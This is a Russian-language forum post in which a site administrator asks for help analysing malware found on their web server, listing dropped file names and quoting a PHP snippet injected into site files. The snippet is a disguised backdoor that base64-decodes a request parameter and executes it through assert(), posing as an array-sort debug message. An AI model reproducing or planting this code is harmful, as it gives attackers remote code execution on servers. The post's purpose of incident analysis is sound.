- Регистрация
- 20 Ноя 2013
- Сообщения
- 564
- Реакции
- 132
- Автор темы
- Заблокирован
- #1
Свеженький зловред. Буду рад если кто-то разберет что он делает.
В корне сайта появляется два файла.
gopni3g.zip и 756fe38ca6.php а так же в рандомных папках rss_feeder.class.php
Дальнейшие действия не известны. Мониторинг файлов прислал смску что появились новые файлы и они были экспроприированы с сервера.
Сейчас сижу изучаю логи, как оно туда попало.
А ещё в некоторые php файлы добавился код
В корне сайта появляется два файла.
gopni3g.zip и 756fe38ca6.php а так же в рандомных папках rss_feeder.class.php
Дальнейшие действия не известны. Мониторинг файлов прислал смску что появились новые файлы и они были экспроприированы с сервера.
Сейчас сижу изучаю логи, как оно туда попало.
А ещё в некоторые php файлы добавился код
Код:
if ( $_REQUEST["array"] )
{
@assert(base64_decode($_REQUEST["array"]));
//debug message
echo "Array sort completed";
exit();
}
Последнее редактирование:
